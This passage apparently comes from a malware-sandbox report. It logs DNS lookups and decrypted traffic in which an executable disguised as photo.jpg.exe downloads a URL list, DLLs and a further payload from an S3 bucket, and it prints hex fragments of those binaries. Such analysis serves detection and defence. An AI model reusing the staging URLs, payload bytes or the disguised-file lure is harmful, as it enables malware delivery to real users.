                                      Apr 2, 2025 16:22:58.007942915 CEST1.1.1.1192.168.2.90xe627No error (0)s3-r-w.ap-southeast-1.amazonaws.com52.219.132.31A (IP address)IN (0x0001)false
                                      Apr 2, 2025 16:22:58.007942915 CEST1.1.1.1192.168.2.90xe627No error (0)s3-r-w.ap-southeast-1.amazonaws.com3.5.148.142A (IP address)IN (0x0001)false
                                      Apr 2, 2025 16:22:58.007942915 CEST1.1.1.1192.168.2.90xe627No error (0)s3-r-w.ap-southeast-1.amazonaws.com3.5.149.130A (IP address)IN (0x0001)false
                                      Apr 2, 2025 16:22:58.007942915 CEST1.1.1.1192.168.2.90xe627No error (0)s3-r-w.ap-southeast-1.amazonaws.com52.219.125.35A (IP address)IN (0x0001)false
                                      Apr 2, 2025 16:22:58.007942915 CEST1.1.1.1192.168.2.90xe627No error (0)s3-r-w.ap-southeast-1.amazonaws.com3.5.150.253A (IP address)IN (0x0001)false
                                      Apr 2, 2025 16:23:02.511467934 CEST1.1.1.1192.168.2.90xc509No error (0)imagesyd.s3.ap-southeast-1.amazonaws.coms3-r-w.ap-southeast-1.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                      Apr 2, 2025 16:23:02.511467934 CEST1.1.1.1192.168.2.90xc509No error (0)s3-r-w.ap-southeast-1.amazonaws.com52.219.124.23A (IP address)IN (0x0001)false
                                      Apr 2, 2025 16:23:02.511467934 CEST1.1.1.1192.168.2.90xc509No error (0)s3-r-w.ap-southeast-1.amazonaws.com3.5.147.175A (IP address)IN (0x0001)false
                                      Apr 2, 2025 16:23:02.511467934 CEST1.1.1.1192.168.2.90xc509No error (0)s3-r-w.ap-southeast-1.amazonaws.com52.219.164.106A (IP address)IN (0x0001)false
                                      Apr 2, 2025 16:23:02.511467934 CEST1.1.1.1192.168.2.90xc509No error (0)s3-r-w.ap-southeast-1.amazonaws.com3.5.150.166A (IP address)IN (0x0001)false
                                      Apr 2, 2025 16:23:02.511467934 CEST1.1.1.1192.168.2.90xc509No error (0)s3-r-w.ap-southeast-1.amazonaws.com3.5.150.126A (IP address)IN (0x0001)false
                                      Apr 2, 2025 16:23:02.511467934 CEST1.1.1.1192.168.2.90xc509No error (0)s3-r-w.ap-southeast-1.amazonaws.com52.219.128.99A (IP address)IN (0x0001)false
                                      Apr 2, 2025 16:23:02.511467934 CEST1.1.1.1192.168.2.90xc509No error (0)s3-r-w.ap-southeast-1.amazonaws.com52.219.164.23A (IP address)IN (0x0001)false
                                      Apr 2, 2025 16:23:02.511467934 CEST1.1.1.1192.168.2.90xc509No error (0)s3-r-w.ap-southeast-1.amazonaws.com3.5.146.146A (IP address)IN (0x0001)false
                                      Apr 2, 2025 16:23:07.223876953 CEST1.1.1.1192.168.2.90x2c0bNo error (0)imagesyd.s3.ap-southeast-1.amazonaws.coms3-r-w.ap-southeast-1.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                      Apr 2, 2025 16:23:07.223876953 CEST1.1.1.1192.168.2.90x2c0bNo error (0)s3-r-w.ap-southeast-1.amazonaws.com52.219.132.99A (IP address)IN (0x0001)false
                                      Apr 2, 2025 16:23:07.223876953 CEST1.1.1.1192.168.2.90x2c0bNo error (0)s3-r-w.ap-southeast-1.amazonaws.com52.219.164.114A (IP address)IN (0x0001)false
                                      Apr 2, 2025 16:23:07.223876953 CEST1.1.1.1192.168.2.90x2c0bNo error (0)s3-r-w.ap-southeast-1.amazonaws.com52.219.132.199A (IP address)IN (0x0001)false
                                      Apr 2, 2025 16:23:07.223876953 CEST1.1.1.1192.168.2.90x2c0bNo error (0)s3-r-w.ap-southeast-1.amazonaws.com52.219.133.11A (IP address)IN (0x0001)false
                                      Apr 2, 2025 16:23:07.223876953 CEST1.1.1.1192.168.2.90x2c0bNo error (0)s3-r-w.ap-southeast-1.amazonaws.com52.219.129.90A (IP address)IN (0x0001)false
                                      Apr 2, 2025 16:23:07.223876953 CEST1.1.1.1192.168.2.90x2c0bNo error (0)s3-r-w.ap-southeast-1.amazonaws.com3.5.146.189A (IP address)IN (0x0001)false
                                      Apr 2, 2025 16:23:07.223876953 CEST1.1.1.1192.168.2.90x2c0bNo error (0)s3-r-w.ap-southeast-1.amazonaws.com52.219.133.51A (IP address)IN (0x0001)false
                                      Apr 2, 2025 16:23:07.223876953 CEST1.1.1.1192.168.2.90x2c0bNo error (0)s3-r-w.ap-southeast-1.amazonaws.com3.5.146.138A (IP address)IN (0x0001)false
                                      Apr 2, 2025 16:23:11.994951963 CEST1.1.1.1192.168.2.90x9b65No error (0)u.arpuu.com13.208.251.115A (IP address)IN (0x0001)false

                                      HTTP Request Dependency Graph

                                      • imagesyd.s3.ap-southeast-1.amazonaws.com

                                      HTTPS Proxied Packets

                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      0192.168.2.9496843.5.150.2194437144C:\Users\user\Desktop\photo.jpg.exe
                                      TimestampBytes transferredDirectionData
                                      2025-04-02 14:22:29 UTC96OUTGET /uu.txt HTTP/1.1
                                      Host: imagesyd.s3.ap-southeast-1.amazonaws.com
                                      Connection: Keep-Alive
                                      2025-04-02 14:22:30 UTC446INHTTP/1.1 200 OK
                                      x-amz-id-2: oS8kRhny6n9ahPnAfpLEa+SQsCwPgfOEi46Bxkw2lZ9DQlDeUwty1EAi4xIh2ciPYmKVKciW6SzV6Fz3gY99+30BTGWNDOxl5mzLRK3z6SA=
                                      x-amz-request-id: ZCJWE5YAJ9XD3R47
                                      Date: Wed, 02 Apr 2025 14:22:31 GMT
                                      Last-Modified: Sat, 15 Mar 2025 15:31:00 GMT
                                      ETag: "58c8e33173c57c0402210b9254bd365e"
                                      x-amz-server-side-encryption: AES256
                                      Accept-Ranges: bytes
                                      Content-Type: text/plain
                                      Content-Length: 381
                                      Server: AmazonS3
                                      Connection: close
                                      2025-04-02 14:22:30 UTC381INData Raw: 68 74 74 70 73 3a 2f 2f 69 6d 61 67 65 73 79 64 2e 73 33 2e 61 70 2d 73 6f 75 74 68 65 61 73 74 2d 31 2e 61 6d 61 7a 6f 6e 61 77 73 2e 63 6f 6d 2f 54 41 53 4c 6f 67 69 6e 42 61 73 65 2e 64 6c 6c 0d 0a 68 74 74 70 73 3a 2f 2f 69 6d 61 67 65 73 79 64 2e 73 33 2e 61 70 2d 73 6f 75 74 68 65 61 73 74 2d 31 2e 61 6d 61 7a 6f 6e 61 77 73 2e 63 6f 6d 2f 63 6f 6d 6d 6f 6e 62 61 73 65 2e 64 6c 6c 0d 0a 68 74 74 70 73 3a 2f 2f 69 6d 61 67 65 73 79 64 2e 73 33 2e 61 70 2d 73 6f 75 74 68 65 61 73 74 2d 31 2e 61 6d 61 7a 6f 6e 61 77 73 2e 63 6f 6d 2f 54 41 53 4c 6f 67 69 6e 2e 65 64 73 6b 76 0d 0a 68 74 74 70 73 3a 2f 2f 69 6d 61 67 65 73 79 64 2e 73 33 2e 61 70 2d 73 6f 75 74 68 65 61 73 74 2d 31 2e 61 6d 61 7a 6f 6e 61 77 73 2e 63 6f 6d 2f 54 41 53 4c 6f 67 69 6e 2e
                                      Data Ascii: https://imagesyd.s3.ap-southeast-1.amazonaws.com/TASLoginBase.dllhttps://imagesyd.s3.ap-southeast-1.amazonaws.com/commonbase.dllhttps://imagesyd.s3.ap-southeast-1.amazonaws.com/TASLogin.edskvhttps://imagesyd.s3.ap-southeast-1.amazonaws.com/TASLogin.


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      1192.168.2.9496853.5.150.2194437144C:\Users\user\Desktop\photo.jpg.exe
                                      TimestampBytes transferredDirectionData
                                      2025-04-02 14:22:31 UTC83OUTHEAD /TASLoginBase.dll HTTP/1.1
                                      Host: imagesyd.s3.ap-southeast-1.amazonaws.com
                                      2025-04-02 14:22:31 UTC457INHTTP/1.1 200 OK
                                      x-amz-id-2: qvGD3I22prr7zJEREuNygAwnVSAw4gWUex0e879I4KGhzVZr3HoDHaIlIukyATJtbB9ey7LEh9j/Tdke8S59/oGgBtR/CyQ6Hxpsxwd2cC0=
                                      x-amz-request-id: 4404QTRS5VH04SA7
                                      Date: Wed, 02 Apr 2025 14:22:32 GMT
                                      Last-Modified: Wed, 02 Apr 2025 09:46:04 GMT
                                      ETag: "627b8bb2190258a6c4ec5d7049cff9d8"
                                      x-amz-server-side-encryption: AES256
                                      Accept-Ranges: bytes
                                      Content-Type: binary/octet-stream
                                      Content-Length: 13472
                                      Server: AmazonS3
                                      Connection: close


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      2192.168.2.9496863.5.150.2194437144C:\Users\user\Desktop\photo.jpg.exe
                                      TimestampBytes transferredDirectionData
                                      2025-04-02 14:22:32 UTC99OUTGET /TASLoginBase.dll HTTP/1.1
                                      Range: bytes=0-
                                      Host: imagesyd.s3.ap-southeast-1.amazonaws.com
                                      2025-04-02 14:22:33 UTC506INHTTP/1.1 206 Partial Content
                                      x-amz-id-2: Ik+OvaxcaHL8/68lMz4bD1tcERQYsA08XFvau89roDeGqCyCISFVjICeiH2d241xZUqRhY39Rhn1JyZVrDbk0qvWpLOgQmAUe3G3bd+FdaY=
                                      x-amz-request-id: CJ3Z4EXEA45DSZ4V
                                      Date: Wed, 02 Apr 2025 14:22:34 GMT
                                      Last-Modified: Wed, 02 Apr 2025 09:46:04 GMT
                                      ETag: "627b8bb2190258a6c4ec5d7049cff9d8"
                                      x-amz-server-side-encryption: AES256
                                      Accept-Ranges: bytes
                                      Content-Range: bytes 0-13471/13472
                                      Content-Type: binary/octet-stream
                                      Content-Length: 13472
                                      Server: AmazonS3
                                      Connection: close
                                      2025-04-02 14:22:33 UTC13472INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 dd 38 55 de 99 59 3b 8d 99 59 3b 8d 99 59 3b 8d 65 79 29 8d 98 59 3b 8d 17 46 28 8d 9f 59 3b 8d 52 69 63 68 99 59 3b 8d 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 36 ec d4 67 00 00 00 00 00 00 00 00 e0 00 0e 21 0b 01 05 0c 00 02 00 00 00 06 00 00 00 00 00 00 27 10 00 00 00 10 00 00 00 20 00 00 00 00 00 10 00 10 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00
                                      Data Ascii: MZ@!L!This program cannot be run in DOS mode.$8UY;Y;Y;ey)Y;F(Y;RichY;PEL6g!'


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      3192.168.2.94968752.219.129.354437144C:\Users\user\Desktop\photo.jpg.exe
                                      TimestampBytes transferredDirectionData
                                      2025-04-02 14:22:34 UTC81OUTHEAD /commonbase.dll HTTP/1.1
                                      Host: imagesyd.s3.ap-southeast-1.amazonaws.com
                                      2025-04-02 14:22:35 UTC427INHTTP/1.1 200 OK
                                      x-amz-id-2: /wxqSx/J4PUHLmeqP00IDOa+f+cQYxxGAmKW+g+iwj8i/kgHPZpsD7wRjHK/lpc24MFSvNO+Vpc=
                                      x-amz-request-id: X04R6DPTN8C3YBFE
                                      Date: Wed, 02 Apr 2025 14:22:36 GMT
                                      Last-Modified: Mon, 31 Mar 2025 08:25:41 GMT
                                      ETag: "fe96dd18c9789c78a6011b6f9821d205"
                                      x-amz-server-side-encryption: AES256
                                      Accept-Ranges: bytes
                                      Content-Type: binary/octet-stream
                                      Content-Length: 2399904
                                      Server: AmazonS3
                                      Connection: close


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      4192.168.2.94968852.219.129.354437144C:\Users\user\Desktop\photo.jpg.exe
                                      TimestampBytes transferredDirectionData
                                      2025-04-02 14:22:36 UTC97OUTGET /commonbase.dll HTTP/1.1
                                      Range: bytes=0-
                                      Host: imagesyd.s3.ap-southeast-1.amazonaws.com
                                      2025-04-02 14:22:36 UTC480INHTTP/1.1 206 Partial Content
                                      x-amz-id-2: cuO7iOD0Ov5XxIjzsUHu2S1ZqMGHjIRYkGsMHImr86OKxUsr4JXvk36X+M6cZvRfrQYOE1ManH0=
                                      x-amz-request-id: BDKY9671HB8QKND9
                                      Date: Wed, 02 Apr 2025 14:22:37 GMT
                                      Last-Modified: Mon, 31 Mar 2025 08:25:41 GMT
                                      ETag: "fe96dd18c9789c78a6011b6f9821d205"
                                      x-amz-server-side-encryption: AES256
                                      Accept-Ranges: bytes
                                      Content-Range: bytes 0-2399903/2399904
                                      Content-Type: binary/octet-stream
                                      Content-Length: 2399904
                                      Server: AmazonS3
                                      Connection: close
                                      2025-04-02 14:22:37 UTC16384INData Raw: 4d 5a 50 00 02 00 00 00 04 00 0f 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 ba 10 00 0e 1f b4 09 cd 21 b8 01 4c cd 21 90 90 54 68 69 73 20 70 72 6f 67 72 61 6d 20 6d 75 73 74 20 62 65 20 72 75 6e 20 75 6e 64 65 72 20 57 69 6e 33 32 0d 0a 24 37 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 0b 00 69 f6 5e 64 00 00 00 00 00 00 00 00 e0 00 8e a1 0b 01 02 19 00 50 20 00 00 22 04 00 00 00 00 00 40 6a 20 00 00 10 00 00 00 70 20 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 40 25 00 00 04 00 00 29 47 25 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 80 21 00 e6 08 00
                                      Data Ascii: MZP@!L!This program must be run under Win32$7PELi^dP "@j p @@%)G%!
                                      2025-04-02 14:22:37 UTC544INData Raw: ff 25 10 3a 61 00 8b c0 ff 25 08 3a 61 00 8b c0 ff 25 04 3a 61 00 8b c0 ff 25 00 3a 61 00 8b c0 ff 25 40 3a 61 00 8b c0 ff 25 3c 3a 61 00 8b c0 ff 25 38 3a 61 00 8b c0 ff 25 34 3a 61 00 8b c0 ff 25 30 3a 61 00 8b c0 ff 25 f8 39 61 00 8b c0 ff 25 f4 39 61 00 8b c0 ff 25 f0 39 61 00 8b c0 ff 25 2c 3a 61 00 8b c0 68 00 70 61 00 e8 f6 93 00 00 59 5a 87 04 24 c3 50 52 51 68 d4 71 61 00 e9 e3 ff ff ff 8d 40 00 ff 25 d4 71 61 00 90 90 53 83 c4 bc bb 0a 00 00 00 c7 04 24 44 00 00 00 54 e8 fa fe ff ff f6 44 24 2c 01 74 05 0f b7 5c 24 30 8b c3 83 c4 44 5b c3 8d 40 00 ff 25 28 3a 61 00 8b c0 ff 25 24 3a 61 00 8b c0 ff 25 20 3a 61 00 00 00 41 6e 20 75 6e 65 78 70 65 63 74 65 64 20 6d 65 6d 6f 72 79 20 6c 65 61 6b 20 68 61 73 20 6f 63 63 75 72 72 65 64 2e 20 00 00 00
                                      Data Ascii: %:a%:a%:a%:a%@:a%<:a%8:a%4:a%0:a%9a%9a%9a%,:ahpaYZ$PRQhqa@%qaS$DTD$,t\$0D[@%(:a%$:a% :aAn unexpected memory leak has occurred.
                                      2025-04-02 14:22:37 UTC16384INData Raw: 08 df 68 10 df 68 18 8b 48 20 89 4a 20 df 7a 18 df 7a 10 df 7a 08 df 3a c3 8d 40 00 df 28 df 68 08 df 68 10 df 68 18 df 68 20 8b 48 28 89 4a 28 df 7a 20 df 7a 18 df 7a 10 df 7a 08 df 3a c3 90 df 28 df 68 08 df 68 10 df 68 18 df 68 20 df 68 28 8b 48 30 89 4a 30 df 7a 28 df 7a 20 df 7a 18 df 7a 10 df 7a 08 df 3a c3 8d 40 00 df 28 df 68 08 df 68 10 df 68 18 df 68 20 df 68 28 df 68 30 8b 48 38 89 4a 38 df 7a 30 df 7a 28 df 7a 20 df 7a 18 df 7a 10 df 7a 08 df 3a c3 90 df 28 df 68 08 df 68 10 df 68 18 df 68 20 df 68 28 df 68 30 df 68 38 8b 48 40 89 4a 40 df 7a 38 df 7a 30 df 7a 28 df 7a 20 df 7a 18 df 7a 10 df 7a 08 df 3a c3 8d 40 00 83 e9 0c 01 c8 01 ca f7 d9 79 13 df 2c 01 df 6c 01 08 df 7c 11 08 df 3c 11 83 c1 10 78 ed df 2c 01 df 3c 11 8b 44 01 08 89 44 11
                                      Data Ascii: hhH J zzz:@(hhhh H(J(z zzz:(hhhh h(H0J0z(z zzz:@(hhhh h(h0H8J8z0z(z zzz:(hhhh h(h0h8H@J@z8z0z(z zzz:@y,l|<x,<DD
                                      2025-04-02 14:22:37 UTC1024INData Raw: 70 60 00 8b 45 0c 48 0f 85 87 02 00 00 e8 d2 fe ff ff c2 04 00 c3 8b c0 55 8b ec 6a 00 53 56 8b f2 8b d8 33 c0 55 68 80 8e 40 00 64 ff 30 64 89 20 8d 55 fc 8b c3 e8 bd 41 00 00 8b 55 fc 8b c6 b9 00 00 00 00 e8 2a 0e 00 00 33 c0 5a 59 59 64 89 10 68 87 8e 40 00 8d 45 fc e8 0d 05 00 00 c3 e9 a3 fa ff ff eb f0 5e 5b 59 5d c3 55 8b ec 6a 00 53 56 8b f2 8b d8 33 c0 55 68 cf 8e 40 00 64 ff 30 64 89 20 8d 55 fc 8b c3 e8 69 41 00 00 8b 55 fc 8b c6 e8 53 11 00 00 33 c0 5a 59 59 64 89 10 68 d6 8e 40 00 8d 45 fc e8 be 04 00 00 c3 e9 54 fa ff ff eb f0 5e 5b 59 5d c3 90 53 56 8b f2 8b d8 8b d6 8b c3 e8 2d 41 00 00 5e 5b c3 8b c0 53 31 db 57 56 8b 3c 18 8d 74 18 04 8b 46 04 8b 04 18 8b 16 01 da 8b 4e 08 85 c9 74 07 49 74 0b 49 74 0f cc e8 1f ff ff ff eb 0c e8 6c ff ff
                                      Data Ascii: p`EHUjSV3Uh@d0d UAU*3ZYYdh@E^[Y]UjSV3Uh@d0d UiAUS3ZYYdh@ET^[Y]SV-A^[S1WV<tFNtItItl
                                      2025-04-02 14:22:37 UTC16384INData Raw: b4 8b 40 00 64 8b 11 52 64 89 21 8b 45 08 8b 48 04 8b 10 51 52 e8 da d5 ff ff 5a 58 ff d2 31 d2 59 64 89 0a 59 5d 5d c2 04 00 8b c0 55 8b ec 83 c4 f8 53 56 57 8b f1 89 55 f8 89 45 fc 8b 7d 10 83 3d 34 70 60 00 00 74 0e 8b d7 8b c6 ff 15 34 70 60 00 8b d8 eb 11 b8 08 00 00 00 e8 77 d5 ff ff 8b d8 89 33 89 7b 04 c6 05 5d d0 60 00 01 8b 45 08 50 8b 45 0c 50 53 b8 14 92 40 00 50 8b 45 f8 50 8b 45 fc 50 e8 7d b8 ff ff 8b f0 85 f6 75 07 8b c3 e8 5c d5 ff ff 8b c6 5f 5e 5b 59 59 5d c2 0c 00 90 53 8b d8 83 3d 38 70 60 00 00 74 08 8b c3 ff 15 38 70 60 00 53 e8 62 b8 ff ff 5b c3 85 c0 7e 39 50 01 c0 70 2f 83 c0 0e 70 2a e8 05 d5 ff ff 83 c0 0c 5a c7 40 f8 01 00 00 00 89 50 fc 66 c7 04 50 00 00 66 c7 40 f6 02 00 8b 15 04 d9 60 00 66 89 50 f4 c3 e9 0b e1 ff ff 31 c0
                                      Data Ascii: @dRd!EHQRZX1YdY]]USVWUE}=4p`t4p`w3{]`EPEPS@PEPEP}u\_^[YY]S=8p`t8p`Sb[~9Pp/p*Z@PfPf@`fP1
                                      2025-04-02 14:22:37 UTC1024INData Raw: 00 00 00 e8 cc c8 ff ff 5e 5b c3 90 53 51 8b da 8b c3 e8 8d 95 ff ff 89 04 24 8b 04 24 5a 5b c3 83 c4 f8 89 14 24 8b c4 8b d1 e8 dd 95 ff ff 8b 04 24 89 44 24 04 8b 44 24 04 59 5a c3 8d 40 00 51 89 14 24 8b 04 24 e8 a8 95 ff ff 5a c3 8b c0 55 8b ec 51 53 8b d9 89 55 fc 8b 45 fc e8 fa e2 ff ff 33 c0 55 68 bc d2 40 00 64 ff 30 64 89 20 8b 4d 08 8b 55 0c 8b 45 fc 03 c3 e8 1c 97 ff ff 33 c0 5a 59 59 64 89 10 68 c3 d2 40 00 8d 45 fc 8b 15 1c 45 40 00 e8 41 e2 ff ff c3 e9 67 b6 ff ff eb ea 5b 59 5d c2 08 00 8d 40 00 55 8b ec 83 c4 f8 89 4d fc 89 55 f8 8b 45 fc e8 9c e2 ff ff 33 c0 55 68 1e d3 40 00 64 ff 30 64 89 20 8b 4d 08 8b 45 fc 8b 55 0c 8d 14 10 8b 45 f8 e8 ba 96 ff ff 33 c0 5a 59 59 64 89 10 68 25 d3 40 00 8d 45 fc 8b 15 1c 45 40 00 e8 df e1 ff ff c3 e9
                                      Data Ascii: ^[SQ$$Z[$$D$D$YZ@Q$$ZUQSUE3Uh@d0d MUE3ZYYdh@EE@Ag[Y]@UMUE3Uh@d0d MEUE3ZYYdh%@EE@
                                      2025-04-02 14:22:37 UTC16384INData Raw: 59 5d c2 08 00 8d 40 00 55 8b ec 51 53 8b d9 89 55 fc 8b 45 fc e8 42 df ff ff 33 c0 55 68 79 d6 40 00 64 ff 30 64 89 20 8b 4d 08 03 c9 03 c9 8b 55 0c 8b 45 fc 8d 04 98 e8 5f 93 ff ff 33 c0 5a 59 59 64 89 10 68 80 d6 40 00 8d 45 fc 8b 15 3c 46 40 00 e8 84 de ff ff c3 e9 aa b2 ff ff eb ea 5b 59 5d c2 08 00 8b c0 55 8b ec 83 c4 f8 89 4d fc 89 55 f8 8b 45 fc e8 e0 de ff ff 33 c0 55 68 de d6 40 00 64 ff 30 64 89 20 8b 4d 08 03 c9 03 c9 8b 45 fc 8b 55 0c 8d 14 90 8b 45 f8 e8 fa 92 ff ff 33 c0 5a 59 59 64 89 10 68 e5 d6 40 00 8d 45 fc 8b 15 3c 46 40 00 e8 1f de ff ff c3 e9 45 b2 ff ff eb ea 59 59 5d c2 08 00 90 55 8b ec 51 53 8b d9 89 55 fc 8b 45 fc e8 7e de ff ff 33 c0 55 68 3f d7 40 00 64 ff 30 64 89 20 8b 4d 08 03 c9 03 c9 03 c9 8b 55 0c 8b 45 fc 8d 04 d8 e8
                                      Data Ascii: Y]@UQSUEB3Uhy@d0d MUE_3ZYYdh@E<F@[Y]UMUE3Uh@d0d MEUE3ZYYdh@E<F@EYY]UQSUE~3Uh?@d0d MUE
                                      2025-04-02 14:22:37 UTC1024INData Raw: 61 00 8b c0 ff 25 e8 40 61 00 8b c0 ff 25 e4 40 61 00 8b c0 ff 25 e0 40 61 00 8b c0 ff 25 dc 40 61 00 8b c0 ff 25 d4 40 61 00 8b c0 ff 25 d0 40 61 00 8b c0 ff 25 d0 40 61 00 8b c0 68 80 70 61 00 e8 02 ca ff ff 59 5a 87 04 24 c3 ff 25 cc 40 61 00 8b c0 ff 25 c8 40 61 00 8b c0 ff 25 c4 40 61 00 8b c0 ff 25 c0 40 61 00 8b c0 ff 25 bc 40 61 00 8b c0 ff 25 b8 40 61 00 8b c0 ff 25 b4 40 61 00 8b c0 ff 25 b0 40 61 00 8b c0 ff 25 ac 40 61 00 8b c0 ff 25 a8 40 61 00 8b c0 ff 25 a4 40 61 00 8b c0 ff 25 a0 40 61 00 8b c0 ff 25 9c 40 61 00 8b c0 ff 25 98 40 61 00 8b c0 ff 25 94 40 61 00 8b c0 ff 25 90 40 61 00 8b c0 ff 25 8c 40 61 00 8b c0 ff 25 88 40 61 00 8b c0 ff 25 84 40 61 00 8b c0 ff 25 80 40 61 00 8b c0 ff 25 7c 40 61 00 8b c0 ff 25 78 40 61 00 8b c0 ff 25 74
                                      Data Ascii: a%@a%@a%@a%@a%@a%@a%@ahpaYZ$%@a%@a%@a%@a%@a%@a%@a%@a%@a%@a%@a%@a%@a%@a%@a%@a%@a%@a%@a%@a%|@a%x@a%t
                                      2025-04-02 14:22:37 UTC16384INData Raw: ff 25 44 3f 61 00 8b c0 68 60 70 61 00 e8 36 c6 ff ff 59 5a 87 04 24 c3 50 52 51 68 f4 71 61 00 e9 e3 ff ff ff 8d 40 00 ff 25 f4 71 61 00 90 90 ff 25 40 3f 61 00 8b c0 ff 25 3c 3f 61 00 8b c0 ff 25 38 3f 61 00 8b c0 ff 25 34 3f 61 00 8b c0 ff 25 30 3f 61 00 8b c0 ff 25 2c 3f 61 00 8b c0 ff 25 28 3f 61 00 8b c0 ff 25 24 3f 61 00 8b c0 ff 25 20 3f 61 00 8b c0 ff 25 1c 3f 61 00 8b c0 ff 25 18 3f 61 00 8b c0 ff 25 14 3f 61 00 8b c0 ff 25 10 3f 61 00 8b c0 ff 25 0c 3f 61 00 8b c0 ff 25 08 3f 61 00 8b c0 ff 25 04 3f 61 00 8b c0 ff 25 00 3f 61 00 8b c0 ff 25 fc 3e 61 00 8b c0 ff 25 f8 3e 61 00 8b c0 ff 25 f4 3e 61 00 8b c0 ff 25 f0 3e 61 00 8b c0 ff 25 ec 3e 61 00 8b c0 ff 25 e8 3e 61 00 8b c0 ff 25 e4 3e 61 00 8b c0 ff 25 e0 3e 61 00 8b c0 ff 25 dc 3e 61 00 8b
                                      Data Ascii: %D?ah`pa6YZ$PRQhqa@%qa%@?a%<?a%8?a%4?a%0?a%,?a%(?a%$?a% ?a%?a%?a%?a%?a%?a%?a%?a%?a%>a%>a%>a%>a%>a%>a%>a%>a%>a
                                      2025-04-02 14:22:37 UTC1024INData Raw: 02 02 02 02 02 02 07 07 0c 0c 02 02 02 02 02 02 02 02 02 02 02 02 07 02 0c 0c 02 02 02 02 02 02 02 02 02 02 02 02 07 07 07 07 01 01 0a 0c 0c 0c 0c 0c 0c 0c 0a 0a 0a 0a 0a 0a 0a 0a 0c 0a 0a 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 15 15 15 06 15 15 15 17 07 0c 02 02 0d 0d 0d 0d 0d 0d 0d 0d 0d 0d 02 02 02 02 02 02 0f 0f 0f 0f 0f 0f 0f 0f 0f 0f 02 02 02 02 02 02 15 15 15 15 15 15 11 15 15 15 15 0c 0c 0c 1d 02 07 07 07 06 07 07 07 07 07 07 07 07 07 07 07 07 07 07 07 07 07 07 07 07 02 02 02 02 02 02 02 02 07 07 07 07 07 07 07 07 07 0c 07 02 02 02 02 02 07 07 07 07 07 07 02 02 02 02 02 02 02 02 02 02 0c 0c 0c 0a 0a 0a 0a 0c 0c 0a 0a 0a 02 02 02 02 0a 0a 0c 0a 0a 0a 0a 0a 0a 0c 0c 0c 02 02 02 02 1a 02 02 02 15 15 0d 0d 0d 0d 0d 0d 0d 0d 0d 0d 0a 0a 0a 0a 0a 0a 0a 0a 0a
                                      Data Ascii:


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      5192.168.2.9496893.5.150.1004437144C:\Users\user\Desktop\photo.jpg.exe
                                      TimestampBytes transferredDirectionData
                                      2025-04-02 14:22:40 UTC81OUTHEAD /TASLogin.edskv HTTP/1.1
                                      Host: imagesyd.s3.ap-southeast-1.amazonaws.com
                                      2025-04-02 14:22:41 UTC459INHTTP/1.1 200 OK
                                      x-amz-id-2: Gc/qpy18FG+0iqIC0uTbo6i/IXSBvQmcCKhoiCJENq67umxErJtAN1h1zNFZdTVgkh87rMc8XQcKaI3cpllugWvpJJs9hl5sh9rPYa/p63Y=
                                      x-amz-request-id: 5A8S7M8Z8SKAM11P
                                      Date: Wed, 02 Apr 2025 14:22:42 GMT
                                      Last-Modified: Sat, 15 Mar 2025 14:35:11 GMT
                                      ETag: "44f432c76ebf0b7ba26f37ce9cc70aea"
                                      x-amz-server-side-encryption: AES256
                                      Accept-Ranges: bytes
                                      Content-Type: binary/octet-stream
                                      Content-Length: 2874368
                                      Server: AmazonS3
                                      Connection: close


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      6192.168.2.9496913.5.150.1004437144C:\Users\user\Desktop\photo.jpg.exe
                                      TimestampBytes transferredDirectionData
                                      2025-04-02 14:22:42 UTC97OUTGET /TASLogin.edskv HTTP/1.1
                                      Range: bytes=0-
                                      Host: imagesyd.s3.ap-southeast-1.amazonaws.com
                                      2025-04-02 14:22:43 UTC512INHTTP/1.1 206 Partial Content
                                      x-amz-id-2: V3XhLWk7hSrS7vXOrZx6tQWpCfusRRKh8OH3fxDBPzUrpqHzP9DntaVtcsd2O5yduOa6NnC0mrKwwkvsC0Mo5Dz9dZ72EI/uTfQK8Hnp2/A=
                                      x-amz-request-id: MMJZBPDBK0ADPNQ5
                                      Date: Wed, 02 Apr 2025 14:22:43 GMT
                                      Last-Modified: Sat, 15 Mar 2025 14:35:11 GMT
                                      ETag: "44f432c76ebf0b7ba26f37ce9cc70aea"
                                      x-amz-server-side-encryption: AES256
                                      Accept-Ranges: bytes
                                      Content-Range: bytes 0-2874367/2874368
                                      Content-Type: binary/octet-stream
                                      Content-Length: 2874368
                                      Server: AmazonS3
                                      Connection: close
